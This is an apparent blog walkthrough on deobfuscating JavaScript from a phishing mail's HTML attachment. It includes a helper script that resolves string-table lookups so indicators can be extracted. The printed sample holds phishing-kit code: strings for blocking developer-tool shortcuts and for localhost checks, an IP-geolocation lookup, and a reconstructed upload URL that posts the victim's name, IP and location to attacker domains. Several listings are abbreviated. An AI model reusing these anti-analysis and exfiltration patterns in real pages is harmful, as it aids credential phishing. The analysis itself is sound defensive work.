Deobfuscating Javascript in Phishing mails

My second post on how to deobfuscate phishing content. Let's go!
Phase 1: Got some phishing mails with encoded content:
FILENAME.pdf.htm

Output the content with a dummy mail address (!) by calling console.log(decryptedString);
Phase 2: More things to deobfuscate
We now have some hex-encoded content; we simply console.log it again:

With console.log("var _0x99af=["\x51\x32\x46\x73\x62\x43..}};_0xb456x26()}}")
we get the following output:

We can see some &quot; entities in the output.
So, we can replace them with:
// Excerpt of the Phase 2 output kept as a plain string; the value is abbreviated ("...") on the page.
// NOTE(review): as rendered here, the nested double quotes end the literal early, so this line
// does not parse as shown — presumably the real text carried entities instead of bare quotes.
var SOCOUT = "var _0x99af=["Q2FsbC4wMDQuTWVXY...sb24=","onload","script&... ";
// NOTE(review): the search pattern is presumably the HTML entity `&quot;`, which the page rendering
// seems to have decoded to a bare quote. As written, every double quote would be padded with spaces.
// Confirm against the original helper script.
SOCOUT = SOCOUT.replaceAll('"', ' " ');
Phase 3: String Array Mapping - Build some Helper Script
Now we can see two variables: the first is the array mapping and the second is the content in which the array references get replaced. We need some helper scripts here:
/* -----
SCRIPT :
GNU nano 7.2 deobfuscate-01.js
------ */
// String table lifted from the sample: the obfuscated body refers to every name and literal
// through an index into this array.
// NOTE(review): several entries are abbreviated on the page ("...", "..") and the `"""` entry does
// not parse as shown, so this listing is illustrative. Because entries were dropped, the indexes
// used in ctext1 need not line up with positions in this shortened list (index 6 here is "Ctrl+U",
// while ctext1 calls `[_0x99af[6]]` as a method on a DOM element) — use the full table from the
// original sample when reproducing the analysis.
// Strings that stand out for triage: shortcut names ("Ctrl+U", "Ctrl+Shift+I", ...), "contextmenu",
// "localhost" / "127.0.0.1" next to "Don't run me here!", an IP-geolocation URL, and "post" plus a
// request path. They suggest — to be confirmed in the resolved code — checks against inspection and
// local analysis, and an upload of collected data.
var _0x99af=["Q2FsbC4wMDQuTWVXYXR0Z...sb24=","onload","script","createElement","src","https://code.jq..Found","Ctrl+U","add","keydown","target","string","getElementById","toLowerCase","event","disable_in_input","srcElement","nodeType","parentNode","INPUT","tagName","TEXTAREA","keyCode","which","fromCharCode",",",".","+","split","~","!","@","#","$","%","^","&","*","(",")","_",":",""","<",">","?","|","ctrlKey","shiftKey","altKey","metaKey","length","ctrl","control","shift","alt","meta","keycode","propagate","cancelBubble","returnValue","stopPropagation","preventDefault","all_shortcuts","type","addEventListener","attachEvent","on","callback","detachEvent","removeEventListener","Meta+Alt+U","Ctrl+Shift+I","Ctrl+Shift+J","Ctrl+Shift+C","Meta+C","contextmenu","onkeydown","location","https://microsoft.com","Hmmm ..","toString@","includes","stack","defineProperties","log","hostname","localhost","127.0.0.1","Don't run me here!","https://","slice","random","lopapscop.ws","kfak...op","https://pro.ip-api.com/jso...ntry","city","post","/obufsssssssscaaatoion/","Normal","ip","json","output","Allow_Online","Yes","http://","indexOf","hide","#loadingScreen","No","Both","show","#404_not_found","ajax","getJSON","gud","nr gud"];
// Number of entries in the table; the loop in the helper below runs over this many indexes.
console.log(_0x99af.length);
// The obfuscated body is held as a string literal, so it is only ever handled as text here
// (passed to the helper and printed), never evaluated. It is abbreviated ("...") on the page.
var ctext1 = "var IGOBZL=_0x99af[0];var cbbg=XDJhBBQX;window[_0x99af[1]]= function(){var _0xb456x3=document[_0x99af[3]](_0x99af[2]);_0xb456x3[_0x99af[4]]= _0x99af[5];document[_0x99af[8]](_0x99af[7])[0][_0x99af[6]](_0xb456x3);var _0xb456x4=document[_0x99af[3]](_0x99af[2]);..._0xb456x23=(_0xb456x24)=>{return new Promise((_0xb456x25)=>setTimeout(_0xb456x25,_0xb456x24))};const _0xb456x26=async ()=>{while(_0xb456x22){try{_0xb456x1b();console[_0x99af[106]](_0x99af[138]);_0xb456x22= false}catch(err){console[_0x99af[106]](_0x99af[139]);let _0xb456x27= await _0xb456x23(1000)}}};_0xb456x26()}}";
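/**
 * Resolve string-table lookups in an obfuscated script so that it can be read.
 *
 * Every `_0x99af[i]` reference in `ctext` is swapped for the i-th entry of the
 * global `_0x99af` table; a bracketed property access `[_0x99af[i]]` becomes
 * dot notation. Entries are inserted without quotes, so the result is meant
 * for reading and IoC extraction, not as runnable JavaScript.
 *
 * @param {string} ctext - Obfuscated source, handled purely as text.
 * @returns {string} The text with all table references resolved.
 */
function dobfuscater(ctext) {
  for (let i = 0; i < _0x99af.length; i++) {
    const entry = _0x99af[i];
    // Replacer functions insert the entry literally. A plain replacement string
    // would expand special patterns such as `$&` or `$'` if an entry contained
    // them, silently corrupting the recovered text.
    ctext = ctext.replaceAll('[_0x99af[' + i + ']]', () => '.' + entry);
    ctext = ctext.replaceAll('_0x99af[' + i + ']', () => entry);
    console.log("Get line: (" + i + ") OBFS Code => " + entry);
  }
  // Decode the `&amp;` entity left over from the HTML wrapper; replacing '&'
  // with itself would leave the text unchanged.
  ctext = ctext.replaceAll('&amp;', '&');
  return ctext;
}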
// Run the helper over the captured sample text and print the readable result.
// The sample stays a string throughout; nothing here evaluates it.
let ct_f = dobfuscater(ctext1);
console.log(`\nGet Final Output:\n---------------\n\n${ct_f}`);
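// Values copied out of the readable output so the upload URL can be rebuilt offline.
// The Base64 value is abbreviated on the page.
var IGOBZL="Q2FsbC4wMDQxsb24=";
// The host is built from a random label (Math.random) plus a fixed domain suffix, so the
// hostname printed below differs on every run and is not itself an indicator. The stable
// parts are the domain suffix and the request path; match on those (e.g. as a wildcard).
var kaka90nal="https://"+Math.random().toString(36).slice(2,20)+"."+"lopapXXX.ws";
// Second domain suffix from the string table; built the same way but not printed below.
var ka45k459final2="https://"+Math.random().toString(36).slice(2,20)+"."+"kfak...op";
var kak0011afinal= kaka90nal;
{
  // atob() throws on input that is not well-formed Base64, which an abbreviated value may
  // be. Fall back to the raw text so the IoC line is still printed instead of aborting.
  let decodedName;
  try {
    decodedName = atob(IGOBZL);
  } catch (err) {
    decodedName = IGOBZL;
  }
  console.log("\n\nIOC\'s:\n\n"+kak0011afinal+"/obufsssssssscaaatoion/,data:{'PageType':Normal,'NAMEOFTHEGUY':"+decodedName+",'ip':_0xb456x1d.ip,'city':_0xb456x1d.city,'country':_0xb456x1d.country");
}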
We got something like this: Call MeWattermellon
